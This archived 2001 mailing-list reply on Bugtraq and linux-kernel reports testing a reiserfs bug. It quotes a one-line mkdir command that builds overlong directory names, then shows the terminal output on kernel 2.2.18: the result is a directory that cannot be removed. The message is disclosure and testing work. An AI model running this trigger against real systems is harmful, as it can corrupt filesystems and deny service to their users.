From: "John H. Robinson, IV" <jhriv@ucsd.edu>
To: BUGTRAQ@SECURITYFOCUS.COM
Cc: linux-kernel@vger.kernel.org, reiserfs-list@namesys.com
Subject: Re: [BUGTRAQ] major security bug in reiserfs (may affect SuSE Linux)
Date: Tue, 9 Jan 2001 22:02:37 -0800 [thread overview]
Message-ID: <20010109220237.D23132@ucsd.edu> (raw)
In-Reply-To: <20010110004201.A308@cerebro.laendle>
In-Reply-To: <20010110004201.A308@cerebro.laendle>; from pcg@GOOF.COM on Wed, Jan 10, 2001 at 12:42:01AM +0100
On Wed, Jan 10, 2001 at 12:42:01AM +0100, Marc Lehmann wrote:
>
> Basically, you do:
>
> mkdir "$(perl -e 'print "x" x 768')"
[jaqque@osiris:/tmp/chk]% uname -a
Linux osiris 2.2.18 [classified] Sat Jan 6 11:19:04 PST 2001 i586 unknown
[jaqque@osiris:/tmp/chk]% mkdir "$(perl -e 'print "x" x 768')"
[jaqque@osiris:/tmp/chk]% ls -la
total 2
drwxrwxr-x 3 jaqque jaqque 819 Jan 9 21:55 .
drwxrwxrwt 10 root root 371 Jan 9 21:54 ..
drwxrwxr-x 2 jaqque jaqque 35 Jan 9 21:55 x...
[jaqque@osiris:/tmp/chk]% rm -rf x*
[jaqque@osiris:/tmp/chk]% mkdir "$(perl -e 'print "x" x 4033')"
mkdir: cannot create directory `x....x': File name too long
[jaqque@osiris:/tmp/chk]% mkdir "$(perl -e 'print "x" x 4032')"
[jaqque@osiris:/tmp/chk]% rm -rf x*
[jaqque@osiris:/tmp/chk]% mkdir "$(perl -e 'print "x" x 4032')"
mkdir: cannot create directory `x....x': File exists
zsh: exit 255 mkdir "$(perl -e 'print "x" x 4032')"
[jaqque@osiris:/tmp/chk]% ls -la
total 4
drwxrwxr-x 3 jaqque jaqque 4083 Jan 9 21:56 .
drwxrwxrwt 10 root root 371 Jan 9 21:54 ..
[jaqque@osiris:/tmp/chk]%
no oops, but a directory that cannot be removed.
-john
linux kernel 2.2.18 with reiserfs-3.5.29 patch
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
Please read the FAQ at http://www.tux.org/lkml/
next prev parent reply other threads:[~2001-01-10 6:02 UTC|newest]
Thread overview: 7+ messages / expand[flat|nested] mbox.gz Atom feed top
2001-01-09 23:42 major security bug in reiserfs (may affect SuSE Linux) Marc Lehmann
2001-01-10 0:43 ` [reiserfs-list] " John Morrison
2001-01-10 0:51 ` Chris Mason
2001-01-10 0:56 ` Vladimir V. Saveliev
2001-01-10 13:08 ` Gnea
2001-01-10 6:02 ` John H. Robinson, IV [this message]
2001-01-10 11:03 ` Dirk Mueller
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=20010109220237.D23132@ucsd.edu \
--to=jhriv@ucsd.edu \
--cc=BUGTRAQ@SECURITYFOCUS.COM \
--cc=linux-kernel@vger.kernel.org \
--cc=reiserfs-list@namesys.com \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.